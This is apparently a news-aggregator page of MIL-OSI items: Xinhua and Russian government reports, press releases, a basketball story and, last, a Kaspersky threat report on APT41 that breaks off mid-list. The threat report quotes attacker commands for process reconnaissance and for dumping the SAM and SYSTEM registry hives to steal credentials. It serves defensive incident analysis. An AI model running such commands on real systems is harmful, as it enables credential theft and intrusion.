NewzIntel.com

    • Checkout Page
    • Contact Us
    • Default Redirect Page
    • Frontpage
    • Home-2
    • Home-3
    • Lost Password
    • Member Login
    • Member LogOut
    • Member TOS Page
    • My Account
    • NewzIntel Alert Control-Panel
    • NewzIntel Latest Reports
    • Post Views Counter
    • Privacy Policy
    • Public Individual Page
    • Register
    • Subscription Plan
    • Thank You Page

Category: China

  • MIL-OSI Russia: Presidents of Kyrgyzstan and Mongolia discussed key areas of bilateral cooperation

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    BISHKEK, July 21 (Xinhua) — Talks were held in Bishkek on Monday between Kyrgyz President Sadyr Japarov and Mongolian President Ukhnaagiin Khurelsukh as part of the latter’s state visit to the Kyrgyz Republic, the Kyrgyz president’s Telegram channel reported.

    The parties discussed key areas of bilateral cooperation, including politics, trade and economics, transport and agriculture. Particular attention was paid to digitalization, the development of cultural and humanitarian ties and tourism.

    S. Japarov emphasized that Kyrgyzstan and Mongolia are states historically linked by ties of friendship, the roots of which go back to ancient times. “Comprehensive cooperation with Mongolia is one of the priority areas of development of Kyrgyzstan’s foreign policy,” he noted.

    The President of Kyrgyzstan expressed confidence that the visit of the head of Mongolia will give a powerful impetus to further strengthening political dialogue, expanding trade and economic ties and developing cultural and humanitarian cooperation.

    In turn, U. Khurelsukh emphasized that this visit provides a good opportunity to jointly with the President of Kyrgyzstan to sum up the 30-year path of bilateral relations, assess the implementation of the agreements reached, and also determine priority areas and prospects for cooperation filled with specific economic content.

    “For Mongolia, Kyrgyzstan is an important partner in Central Asia and a kind of bridge connecting the region. We strive to develop mutually beneficial cooperation in all areas, especially in the trade and economic sphere,” the President of Mongolia noted.

    Following the talks, the heads of the two states signed a Joint Declaration on the establishment of a comprehensive partnership between Kyrgyzstan and Mongolia, as well as a number of other documents aimed at increasing cooperation. –0–

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: Conversation between Mikhail Mishustin and the Governor of the Amur Region Vasily Orlov

    Translation. Region: Russian Federal

    Source: Government of the Russian Federation – Government of the Russian Federation –

    An important disclaimer is at the bottom of this article.

    Current issues of the region’s socio-economic development were discussed.

    From the transcript:

    M. Mishustin: Dear Vasily Alexandrovich!

    Conversation between Mikhail Mishustin and the Governor of the Amur Region Vasily Orlov

    July 21, 2025

    Governor of the Amur Region Vasily Orlov

    July 21, 2025

    Previous news Next news

    Conversation between Mikhail Mishustin and the Governor of the Amur Region Vasily Orlov

    Not so long ago, about five years ago, we met here and spoke in detail about the infrastructure elements that were sorely needed in the Amur Region. I remember very well, then we looked at the bridge towards Heihe, talked about checkpoints, a new airport, coastal protection, the creation of modern embankment elements and much more.

    Today, these projects are being implemented systematically. The result of this was a twofold increase in the regional domestic product. This is a very good result. Today, we have seen from the implementation that everything is going as usual.

    The airport we visited is almost ready. I hope that it will welcome and serve the millionth passenger in the new terminal in December, as planned.

    Drive

    The projects “Golden Mile”, “Silver Mile”, the expo center, the hotel, the cable car, all the elements on the embankment, which we also discussed in detail with you – they are all being implemented, and I hope on time.

    It is also pleasing to see the creation of infrastructure for the movement of goods and, of course, for passenger transportation, tourism – both within the country and for tourism towards China. You are a border city.

    And here it is very important that Kanikurgan, as an infrastructure, as a customs and logistics warehouse, as a checkpoint, will become, I think, an anchor for the expansion of the entire transport and logistics system of the Far East.

    To be continued…

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: Mikhail Mishustin visited the city center “Tribuna Hall” in Blagoveshchensk

    Translation. Region: Russian Federal

    Source: Government of the Russian Federation – Government of the Russian Federation –

    An important disclaimer is at the bottom of this article.

    The Prime Minister inspected the Russian-Chinese Friendship House under construction and watched a presentation of key objects of the Blagoveshchensk master plan and the project for coastal protection and embankment reconstruction.

    Mikhail Mishustin visited the city center “Tribuna Hall” in Blagoveshchensk. With the Governor of the Amur Region Vasily Orlov

    July 21, 2025

    Mikhail Mishustin visited the city center “Tribuna Hall” in Blagoveshchensk. With the Governor of the Amur Region Vasily Orlov

    July 21, 2025

    Mikhail Mishustin visited the city center “Tribuna Hall” in Blagoveshchensk. With the Governor of the Amur Region Vasily Orlov

    July 21, 2025

    Mikhail Mishustin visited the city center “Tribuna Hall” in Blagoveshchensk. With the Governor of the Amur Region Vasily Orlov

    July 21, 2025

    Previous news Next news

    Mikhail Mishustin visited the city center “Tribuna Hall” in Blagoveshchensk. With the Governor of the Amur Region Vasily Orlov

    The key objects of the Blagoveshchensk master plan are located in the central part of the city on the Golden Mile section of the Amur embankment, which includes the House of Russian-Chinese Friendship, a cross-border cable car, an international congress and exhibition center, a premium hotel complex, the Fountain Alley, the Amur Dino Park and other objects.

    The entire territory of the Golden Mile is reclaimed and was formed as a result of the implementation of a large-scale project for coastal protection and improvement of the embankment of the city of Blagoveshchensk (implemented in the period from 2013 to 2024 on 10 sites, which are grouped into 3 key clusters – Golden Mile, Silver Mile and Cote d’Azur).

    The project was created using funds from a single subsidy, the regional budget and with the participation of partners (SBER). Within the framework of the project, the largest fountain complex in Eurasia was created, the House of Russian-Chinese Friendship with an observation deck, a dino park were built, and the central square of Blagoveshchensk was landscaped.

    Drive

    Mikhail Mishustin inspected the automobile checkpoint across the state border Kani-Kurgan

    Mikhail Mishustin inspected the new airport complex of the Blagoveshchensk International Airport (Ignatievo) named after N.N. Muravyov-Amursky

    The House of Russian-Chinese Friendship is a separate building with a complex architectural elliptical shape with variable number of storeys and a protruding cornice-spoiler. The area of the object is 6.3 thousand square meters, 2 floors, the roof of the building serves as an observation deck. Finishing works are currently underway at the object, completion is scheduled for September 2025.

    The cross-border cableway across the Amur River between the cities of Blagoveshchensk (Russia) and Heihe (China) is the world’s first cableway between two countries, Russia and China, and opens up great prospects for the development of international tourism and business. The cableway is being built under an intergovernmental agreement signed on September 3, 2015. The construction period is 2019–2025, with commissioning scheduled for May 2026. Technical readiness as of July 2025 is 80%.

    The length of the cable car is 976 meters, it consists of two independent lines with two cabins with a capacity of up to 110 people each, the throughput capacity is 6.8 thousand people per day in each direction, the throughput capacity of the checkpoint across the state border is up to 2.5 million people per year (in both directions).

    On the Russian side, a four-level passenger terminal with a total area of 26 thousand square meters is being built to accommodate the cable car terminal station, a platform and technological equipment, a checkpoint across the state border, a duty-free shop, restaurants, shopping and entertainment facilities. Commissioning is scheduled for May 2026.

    The construction of a multifunctional congress and exhibition center is included in the long-term plan for the comprehensive socio-economic development of Blagoveshchensk for the period up to 2030. The planned start date for construction is the first quarter of 2026, and the completion of work is 2028. International events will be held here (the Russian-Chinese Economic Forum “AmurExpo”, congresses, concerts, exhibitions), a center for Russian-Chinese business cooperation will be created, and a permanent export fair of Russian goods (from food to industrial equipment) for foreign guests will be organized.

    The construction of five-star hotels is planned on the territory adjacent to the cross-border cableway under construction, in the immediate vicinity of the planned international congress and exhibition center.

    The Alley of Fountains is the largest fountain complex in Eurasia, which has become the new calling card of the capital of the Amur Region. It is a pedestrian fountain with an area of 3 thousand square meters with a fogging system and 2114 jets. It was put into operation in May 2024.

    In the evening, the fountain jets “dance” to music, being painted in different colors thanks to the spotlights installed next to the nozzles. Spectators can see “swan wings”, “hearts”, and other water figures.

    The Amur Dinopark is an immersive area that will feature more than 20 exhibits, such as animatronic dinosaurs in jungle-like interiors. Finishing work is currently underway in the new building, with completion scheduled for May 2026.

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: Two killed, nine injured in Kunming road accident

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    KUNMING, July 21 (Xinhua) — Two people were killed and nine others were injured in a traffic accident in Kunming, capital of southwest China’s Yunnan Province, on Sunday, the city’s public security bureau said Monday.

    The incident happened at 1:16 p.m. on Sunday on Jinbi Road in Xishan District, a thoroughfare in Kunming’s main commercial area.

    According to police, a 49-year-old local resident surnamed Li, who was driving a small blue SUV, collided with pedestrians and e-bikers who were following the rules while entering Jinbi Road. The driver then fled the scene, hitting and colliding with other road users.

    The accident left two people dead, four people with minor injuries and five people with minor injuries. All victims were taken to hospitals for treatment and are reported to be in stable condition.

    The driver has now been detained by the police. The results of the preliminary investigation have confirmed that the incident has been classified as a hit and run. According to the report, suspicions of drunk driving or driving under the influence of drugs have been ruled out.

    Further investigation into the accident is underway. -0-

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: China’s Fujian Province Activates Emergency Response Over Typhoon Flood Threat

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    FUZHOU, July 21 (Xinhua) — East China’s Fujian Province issued a Level 4 emergency response at 8 a.m. Monday to address the flood threat posed by Typhoon Wipha, the provincial flood and drought relief headquarters said.

    Under the influence of the outer circulation of Typhoon Wipha, the sixth this year, heavy rains and downpours have been lashing coastal areas of Fujian Province since Sunday.

    According to meteorological services, heavy rains will continue in some areas of the province over the next three days.

    The Provincial Flood and Drought Management Headquarters calls for heightened vigilance against severe weather. All districts and agencies must quickly adopt or make necessary adjustments to emergency response measures, with increased emphasis on monitoring, early warning, and joint consultation to assess risks.

    It is necessary to carefully formulate and implement a large-scale strategy to mitigate the impact of heavy rainfall disasters and respond to secondary hazards such as flash floods in mountainous areas, floods in small and medium-sized rivers, geological disasters and urban flooding, the headquarters stressed.

    On Sunday at around 8:15 p.m., Vipha made landfall for the second time as a strong tropical storm near Hailing Island in Yangjiang, Guangdong Province, southern China. Maximum sustained winds near its epicenter reached 25 meters per second.

    China has a four-tier emergency response system, with tier one being the most serious. -0-

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: Russia to allocate about 180 billion rubles for construction and repair of state border checkpoints — Prime Minister

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    Vladivostok, July 21 (Xinhua) — About 180 billion rubles will be allocated in Russia within the current three-year budget for the construction, repair and technical re-equipment of checkpoints across the state border using advanced digital and technical solutions, Russian Prime Minister Mikhail Mishustin said on Monday.

    According to TASS, during an inspection of the automobile checkpoint across the state border “Kani-Kurgan” in Blagoveshchensk, M. Mishustin said that, in general, a lot of work is being done throughout the country to develop cross-border logistics.

    “In the next five years, we plan to modernize more than a quarter of all existing ones. These are priority points in terms of existing and prospective trade turnover. And in the Far Eastern District alone, such work is planned for more than 30 of them,” the Prime Minister noted. –0–

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: Japan’s PM vows to stay in office after election defeat

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    TOKYO, July 21 (Xinhua) — Japanese Prime Minister Shigeru Ishiba vowed on Monday to remain in office despite a major defeat in the House of Councillors (upper house) election where the ruling Liberal Democratic Party (LDP) and its coalition partner failed to secure a majority.

    Speaking at a press conference, he acknowledged the poor election results and stressed that he felt a great responsibility. “The most important thing now is to avoid stagnation in national politics,” the prime minister said, promising to make efforts to fulfill the duties befitting a leading party.

    His comments come amid growing public discontent over rising living costs and policy mistakes that analysts say contributed to the ruling coalition’s election defeat.

    In the current election, Japanese people voted for candidates for 125 of the 248 seats in the House of Councillors. After the final vote count ended Monday morning, the LDP had won only 39 seats, while its partner, the Komeito Party, had won eight. The coalition had planned to win 50 seats, but failed to do so.

    Now the coalition’s MPs have 122 seats in the upper house, which is less than the 125 needed for a majority.

    Despite the failure, S. Ishiba stressed the need for stability and continuity in the government and officially announced his intention to continue as prime minister. –0–

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: Chinese city of Shangluo and Fergana establish sister city relations

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    BEIJING, July 21 (Xinhua) — Shangluo City in northwest China’s Shaanxi Province and Fergana City, capital of Uzbekistan’s Fergana Region, recently established sister city relations.

    The protocol of intent to develop twinning relations was signed on July 14 during the visit of the trade and economic delegation of the city of Shangluo to Uzbekistan. Thus, the number of twin cities of Shangluo has increased to five, the newspaper “Shaanxi Ribao” /daily newspaper “Shaanxi”/ writes with reference to a source in the city’s commerce department.

    The department stated that the establishment of sister city relations between the cities of Shanlo and Fergana will allow bilateral trade, economic, cultural and educational contacts and cooperation to reach a new level.

    Shangluo City is located at the southern foot of the eastern Qinling Mountains and borders the provinces of Hubei and Henan. Its total area is 19.3 thousand square kilometers. The city includes one urban district and six counties, with a total population of 2.02 million.

    The Shangluo City government will comprehensively expand openness, deepen exchanges and cooperation with partners, expand the international sister city network and promote high-quality development, the newspaper wrote. -0-

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: SCO countries are continuously deepening the interconnectivity of supply chains and production chains

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    QINGDAO, July 21 (Xinhua) — With the global economic architecture changing rapidly, member states of the Shanghai Cooperation Organization (SCO) have been continuously deepening the connectivity of supply chains and industrial chains through pragmatic cooperation, according to participants at the China-SCO Regional Economic and Trade Cooperation Conference held recently in Qingdao, east China’s Shandong Province.

    Li Gang, assistant general manager of Sinopec Group Co., Ltd., expressed hope for deeper cooperation in the upstream and downstream sectors of industrial chains, including joint projects in crude oil refining, jointly upgrading industrial technology, and building more competitive chemical industry clusters, so as to promote the coordinated development of manufacturing industries in the region.

    Logistics and transportation are an important pillar for deepening the connectivity of supply chains and industrial chains. According to the management committee of the China-SCO Regional Economic and Trade Cooperation Demonstration Zone in Qingdao, 4,500 China-Europe international railway trains have been operated on the zone, linking it with 54 cities in 23 countries.

    In addition, at present, the China-SCO Demonstration Zone is also the leader in China in terms of the number of truck shipments under the TIR /International Road Transport/ system.

    According to a local international economic and trade company, the TIR system has greatly improved the efficiency of international trade. With the introduction of the “TIR plus two-way cold chain transportation” model, fruits and vegetables produced in China’s Shandong, Sichuan, Hunan, Guangdong and other regions can also be delivered to Belarus, Russia and other countries.

    “We deliver these fruits and vegetables to St. Petersburg in a maximum of 6 days. For comparison, the transportation of these products by traditional road transport took about 15 days. This business model has attracted many Russian buyers and Chinese exporters of fruits and vegetables,” the company noted.

    According to experts, the continuous deepening of the interconnectedness of supply chains and production chains within the SCO not only promotes the integration development of the regional economy, but also helps to ensure the stability of the global supply chain. -0-

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI: Aurora Mobile’s EngageLab Partners with China Unicom to Develop Next-Generation Global One-Click Verification Ecosystem

    Source: GlobeNewswire (MIL-OSI)

    SHENZHEN, China, July 21, 2025 (GLOBE NEWSWIRE) — Aurora Mobile Limited (NASDAQ: JG) (“Aurora Mobile” or the “Company”), a leading provider of customer engagement and marketing technology services in China, today announced that EngageLab, its leading omni-channel customer engagement platform, has entered into a partnership with China Unicom to launch the Smart Integrated Verification (International Edition), powered by China Unicom’s Open Gateway platform. This collaboration marks a significant step in jointly building a secure and intelligent one-click verification infrastructure for Chinese enterprises expanding overseas.

    At the recent 2025 China Unicom Partner Conference, titled “Advancing Together Toward a New Integrated Ecosystem”, China Unicom showcased its significant achievements in AI infrastructure, technology, and industry development. The event, which focused on the deep integration of AI and the digital economy, attracted over 400 industry partners from more than 70 countries and regions worldwide. Among the highlights was China Unicom’s Open Gateway platform, a leading hub for exposing network capabilities. Leveraging China Unicom’s robust cloud and network infrastructure, the Open Gateway platform provides advanced capability provisioning for internal applications and offers comprehensive, efficient, and secure open solutions to industry partners via standardized APIs. To date, over 90 specialized APIs have been released, covering domains such as anti-fraud and location-based services. The platform has enabled multiple commercial deployment scenarios, including financial fraud prevention and digital support for Chinese enterprises expanding overseas. China Unicom is collaborating with global telecom operators and system integrators to establish a cross-operator platform alliance. It has already achieved platform-level interconnectivity with the first six operators and integrators, including Aurora Mobile.

    As a key partner of China Unicom, Aurora Mobile has developed the Smart Integrated Verification (International Edition) specifically for international business scenarios. The solution eliminates geographic barriers and offers Chinese enterprises expanding overseas a one-stop, global mobile number verification solution. Leveraging China Unicom’s backbone network, spanning over 160 countries and regions with more than 300 overseas nodes, and EngageLab’s decade-long of expertise in user verification, the solution delivers secure, fast, intelligent, and efficient one-click mobile number verification for users worldwide.

    For Chinese enterprises expanding overseas, traditional verification processes are often fragmented and cumbersome. In particular, cross-border identity verification poses a significant challenge to business growth. The Smart Integrated Verification (International Edition) effectively addresses these issues. For instance, after integrating the service, a cross-border e-commerce platform reported a 40% increase in new user registration conversion rates and a 62% drop in customer complaints related to verification failures. Similarly, a global gaming company reduced the average time for the first login from 28 seconds to just three seconds, improving next-day user retention by 27%.

    Building on EngageLab’s industry-leading expertise in global user verification, Aurora Mobile is dedicated to working closely with telecom operators to co-develop an open network capability ecosystem. Looking ahead, EngageLab will continue to deepen its collaboration with China Unicom and expand into more application scenarios based on the Smart Integrated Verification (International Edition), such as “one-click verification + cross-border payment security checks” and “one-click verification + global user profiling and analytics.” The Company is committed to evolving verification into a “super gateway” that seamlessly connects users and services. EngageLab welcomes global partners to join this open ecosystem and contribute to its advancement, working together to drive the development of the global digital economy.

    About Aurora Mobile Limited

    Founded in 2011, Aurora Mobile (NASDAQ: JG) is a leading provider of customer engagement and marketing technology services in China. Since its inception, Aurora Mobile has focused on providing stable and efficient messaging services to enterprises and has grown to be a leading mobile messaging service provider with its first-mover advantage. With the increasing demand for customer reach and marketing growth, Aurora Mobile has developed forward-looking solutions such as Cloud Messaging and Cloud Marketing to help enterprises achieve omnichannel customer reach and interaction, as well as artificial intelligence and big data-driven marketing technology solutions to help enterprises’ digital transformation.

    For more information, please visit https://ir.jiguang.cn/.

    Safe Harbor Statement

    This announcement contains forward-looking statements. These statements are made under the “safe harbor” provisions of the U.S. Private Securities Litigation Reform Act of 1995. These forward-looking statements can be identified by terminology such as “will,” “expects,” “anticipates,” “future,” “intends,” “plans,” “believes,” “estimates,” “confident” and similar statements. Among other things, the Business Outlook and quotations from management in this announcement, as well as Aurora Mobile’s strategic and operational plans, contain forward-looking statements. Aurora Mobile may also make written or oral forward-looking statements in its reports to the U.S. Securities and Exchange Commission, in its annual report to shareholders, in press releases and other written materials and in oral statements made by its officers, directors or employees to third parties. Statements that are not historical facts, including but not limited to statements about Aurora Mobile’s beliefs and expectations, are forward-looking statements. Forward-looking statements involve inherent risks and uncertainties. A number of factors could cause actual results to differ materially from those contained in any forward-looking statement, including but not limited to the following: Aurora Mobile’s strategies; Aurora Mobile’s future business development, financial condition and results of operations; Aurora Mobile’s ability to attract and retain customers; its ability to develop and effectively market data solutions, and penetrate the existing market for developer services; its ability to transition to the new advertising-driven SAAS business model; its ability to maintain or enhance its brand; the competition with current or future competitors; its ability to continue to gain access to mobile data in the future; the laws and regulations relating to data privacy and protection; general economic and business conditions globally and in China and assumptions underlying or related to any of the foregoing. Further information regarding these and other risks is included in the Company’s filings with the Securities and Exchange Commission. All information provided in this press release and in the attachments is as of the date of the press release, and Aurora Mobile undertakes no duty to update such information, except as required under applicable law.

    For more information, please contact:

    Aurora Mobile Limited
    E-mail: ir@jiguang.cn

    Christensen

    In China
    Ms. Xiaoyan Su
    Phone: +86-10-5900-1548
    E-mail: Xiaoyan.Su@christensencomms.com

    In US
    Ms. Linda Bergkamp
    Phone: +1-480-614-3004
    Email: linda.bergkamp@christensencomms.com

    The MIL Network –

    July 21, 2025
  • MIL-OSI China: China get reality check with Asia Cup bronze finish

    Source: People’s Republic of China – State Council News

    China clinched third place at the 2025 FIBA Women’s Asia Cup with a dominant 101-66 victory over South Korea on Sunday, concluding the first major tournament of its Los Angeles Olympic cycle with a bittersweet result that served as both a disappointment and a crucial learning experience.

    While the team secured a podium finish, its title defense was decisively ended a day earlier in the semifinals by a sharp-shooting Japanese team, a defeat that exposed the challenges ahead of China.

    Yang Shuyu (front) of China reacts after the semifinal match between China and Japan at the FIBA Women’s Asia Cup 2025 in Shenzhen, south China’s Guangdong Province, July 19, 2025. (Xinhua/Mao Siqian)

    The wake-up call was delivered by Japan’s accurate long-range attack, led by 19-year-old point guard Kokoro Tanaka, who posted 21 points in the first quarter alone, hitting five-for-five from beyond the arc.

    Japan hit 16 three-pointers in the game, shooting 47.1 percent from deep and scoring 30 more points from beyond the arc than China. The barrage exposed the defensive liabilities of China’s highly anticipated “Twin Towers” lineup.

    The pairing of 2.26-meter (7-foot-5) prodigy Zhang Ziyu and 2.11-meter (6-foot-11) Han Xu, dominant in the group stage against Indonesia, South Korea and New Zealand, struggled against Japan’s “small, fast, and agile” style. Zhang’s slower foot speed was frequently exploited to create open space, while Han was often forced to defend multiple perimeter players.

    “The ‘Twin Towers’ lineup showed some weaknesses in limiting their three-pointers,” head coach Gong Luming admitted post-game. “Their threes posed a huge threat and created a lot of trouble for us. We will learn from this and seriously think about how our big lineups can adapt to this fast-paced style.”

    Center Han Xu acknowledged the team’s shortcomings after the loss. “Against a quick team like Japan, you need to be efficient to limit their fast breaks and threes, but our defense was not good enough,” she said.

    Despite the loss, Gong affirmed the team would not abandon its long-term strategy.

    “We will not change our plans just because we lost this game; that would be wrong. We are preparing for the 2028 Los Angeles Olympics and will continue to build on the experience gained today,” Gong said.

    For 18-year-old Zhang, the tournament was a glimpse of what’s to come. She finished her senior team debut averaging an impressive 15.6 points and 5.6 rebounds. While her dominance in the paint is clear, so are the areas for improvement.

    “Her potential is huge, but the public’s expectations for her are too high right now,” Gong said. “The overall offensive and defensive chemistry with her is still lacking… but this is a process we must go through.”

    The tournament was also an emotional one for Han, who broke down in a press conference after the semifinal loss. Having faced public pressure for skipping overseas leagues to focus on national team duties, she stated her intention to play abroad in the future.

    “After this year’s major tournaments are over, if there is an opportunity to play in an overseas league, I will do my best to fight for it,” Han said.

    “This might be my last time wearing the national team jersey,” said China’s veteran forward Huang Sijing. “Looking back on my 10 years representing China, there have been both joys and regrets, but as I reach the twilight of my career, what I feel most is pride.”

    Although she expressed disappointment with the team’s result at the Asia Cup, Huang acknowledged the broader context. “The team is undergoing a generational transition, and we’re also adapting to a new coaching philosophy. Given we’ve only had three months to work together, I think we’ve already made good progress.”

    As China left Shenzhen with a bronze medal instead of the desired gold, the coach framed the outcome as a necessary wake-up call. He also noted that he had picked up some tactical ideas from Japan, Australia and South Korea during the tournament – insights he said would be valuable for the development of China’s younger players.

    With only three months together, the new squad learned where it stands and the work required to return to the top of the podium.

    “We certainly saw a lot of our own shortcomings, but the experience gained is more important for the team’s future. I hope the team maintains its fighting spirit… that is the foundation for our future development,” Gong added. 

    MIL OSI China News –

    July 21, 2025
  • MIL-OSI: Prosafe SE: SHAREHOLDING DISCLOSURE

    Source: GlobeNewswire (MIL-OSI)

    21 July 2025 – Reference is made to the stock exchange announcement made by Prosafe SE (the “Company”) on 24 April 2025 regarding the recapitalization of the Company, where it was announced, amongst other things, that part of the Company’s debt, including to the institutions listed below, will be converted into equity in the Company (the “Debt Conversion”). Further reference is made to the stock exchange notice made by the Company today, 21 July 2025, regarding completion of the Debt Conversion.

    Following the Debt Conversion, the shareholders listed below will exceed a disclosure threshold pursuant to the Norwegian Securities Trading Act Section 4-2:

    1. Acasta Global Master Fund will own in total 21,555,640 shares in the Company, representing approximately 6.35 % of the outstanding shares and votes in the Company following completion of the Debt Conversion, thereby crossing the 5 % disclosure threshold in the Norwegian Securities Trading Act Section 4‑2;
    1. BlueBay Destra International Event-Driven Credit Fund (“BlueBay Destra”) and The BlueBay Event Driven Credit (Master) Fund Limited (“BlueBay Event”), investment funds under discretional investment management of RBC Global Asset Management (UK) Limited (“RBC GAM UK”), will, when the shares of the two funds are counted together, own a total of 41,251,716 shares in the Company, representing approximately 12.15 % of the outstanding shares and votes in the Company following completion of the Debt Conversion, thereby crossing the 10 % disclosure threshold in the Norwegian Securities Trading Act Section 4‑2. BlueBay Destra will beneficially own 22,688,444 and BlueBay Event will beneficially own 18,563,272 of these shares, representing approximately 6.68 % and 5.47 %, respectively, of the outstanding shares and votes in the Company following completion of the Debt Conversion.
    1. Caius Capital Master Fund (“Caius”), Star V Partners LLC (“Star V”), and LMA-SPC MAP 204 Segregated Portfolio (“LSP”), investment funds under discretional investment management by Caius Capital LLP (“CCL”), will, when the shares of each such fund are counted together, own a total of 57,452,631 shares in the Company, representing approximately 16.92 % of the outstanding shares and votes in the Company, thereby crossing the 15 % disclosure threshold in the Norwegian Securities Trading Act Section 4‑2. Caius will beneficially own 50,274,435, Star V will beneficially own 5,788,560, and LSP will beneficially own 1,389,636 of these shares, representing approximately 14.81 %, 1.71 % and 0.41 %, respectively, of the outstanding shares and votes in the Company following completion of the Debt Conversion.
    1. The Export-Import Bank of China will own in total 42,850,422 shares in the Company, representing approximately 12.62 % of the outstanding shares and votes in the Company, thereby crossing the 10 % disclosure threshold in the Norwegian Securities Trading Act Section 4‑2;
    1. DNB Bank ASA will own in total 47,576,613 shares in the Company (of which 30,233 shares are borrowed shares that have been lent out with a right to recall), representing approximately 14.01 % of the outstanding shares and votes in the Company, thereby crossing the 10 % disclosure threshold in the Norwegian Securities Trading Act Section 4‑2; and
    1. SpareBank 1 Sør-Norge ASA will own in total 17,786,952 in the Company, representing approximately 5.24 % of the outstanding shares and votes in the Company, thereby crossing the 5 % disclosure threshold in the Norwegian Securities Trading Act Section 4‑2,

    each based on a total of 339,504,369 issued and outstanding shares and voting rights in the Company at the time of completion of the Debt Conversion.

    This information is subject to the disclosure requirement in the Norwegian Securities Trading Act section 4‑2.

    The MIL Network –

    July 21, 2025
  • MIL-OSI Banking: Rumble in the jungle: APT41’s new target in Africa

    Source: Securelist – Kaspersky

    Headline: Rumble in the jungle: APT41’s new target in Africa

    Introduction

    Some time ago, Kaspersky MDR analysts detected a targeted attack against government IT services in the African region. The attackers used hardcoded names of internal services, IP addresses, and proxy servers embedded within their malware. One of the C2s was a captive SharePoint server within the victim’s infrastructure.

    During our incident analysis, we were able to determine that the threat actor behind the activity was APT41. This is a Chinese-speaking cyberespionage group known for targeting organizations across multiple sectors, including telecom and energy providers, educational institutions, healthcare organizations and IT energy companies in at least 42 countries. It’s worth noting that, prior to the incident, Africa had experienced the least activity from this APT.

    Detection

    Our MDR team identified suspicious activity on several workstations within an organization’s infrastructure. These were typical alerts indicating the use of the WmiExec module from the Impacket toolkit. Specifically, the alerts showed the following signs of the activity:

    • A process chain of svchost.exe ➔exe ➔ cmd.exe
    • The output of executed commands being written to a file on an administrative network share, with the file name consisting of numbers separated by dots:

    WmiExec process tree

    The attackers also leveraged the Atexec module from the Impacket toolkit.

    Scheduler tasks created by Atexec

    The attackers used these commands to check the availability of their C2 server, both directly over the internet and through an internal proxy server within the organization.

    The source of the suspicious activity turned out to be an unmonitored host that had been compromised. Impacket was executed on it in the context of a service account. We would later get that host connected to our telemetry to pinpoint the source of the infection.

    After the Atexec and WmiExec modules finished running, the attackers temporarily suspended their operations.

    Privilege escalation and lateral movement

    After a brief lull, the attackers sprang back into action. This time, they were probing for running processes and occupied ports:

    cmd.exe /c netstat –ano > C:Windowstemptemp_log.log

    cmd.exe /c tasklist /v > C:Windowstemptemp_log.log

    They were likely trying to figure out if the target hosts had any security solutions installed, such as EDR, MDR or XDR agents, host administration tools, and so on.

    Additionally, the attackers used the built-in reg.exe utility to dump the SYSTEM and SAM registry hives.

    cmd.exe /c reg save HKLMSAM C:Windowstemptemp_3.log

    cmd.exe /c reg save HKLMSYSTEM C:Windowstemptemp_4.log

    On workstations connected to our monitoring systems, our security solution blocked the activity, which resulted in an empty dump file. However, some hosts within the organization were not secured. As a result, the attackers successfully harvested credentials from critical registry hives and leveraged them in their subsequent attacks. This underscores a crucial point: to detect incidents promptly and minimize damage, security solution agents must be installed on all workstations across the organization without exception. Furthermore, the more comprehensive your telemetry data, the more effective your response will be. It’s also crucial to keep a close eye on the permissions assigned to service and user accounts, making sure no one ends up with more access rights than they really need. This is especially true for accounts that exist across multiple hosts in your infrastructure.

    In the incident we’re describing here, two domain accounts obtained from a registry dump were leveraged for lateral movement: a domain account with local administrator rights on all workstations, and a backup solution account with domain administrator privileges. The local administrator privileges allowed the attackers to use the SMB protocol to transfer tools for communicating with the C2 to the administrative network share C$. We will discuss these tools – namely Cobalt Strike and a custom agent – in the next section.

    In most cases, the attackers placed their malicious tools in the C:WINDOWSTASKS directory on target hosts, but they used other paths too:

    1

    2

    3

    4

    5

    6

    7

    c:windowstasks

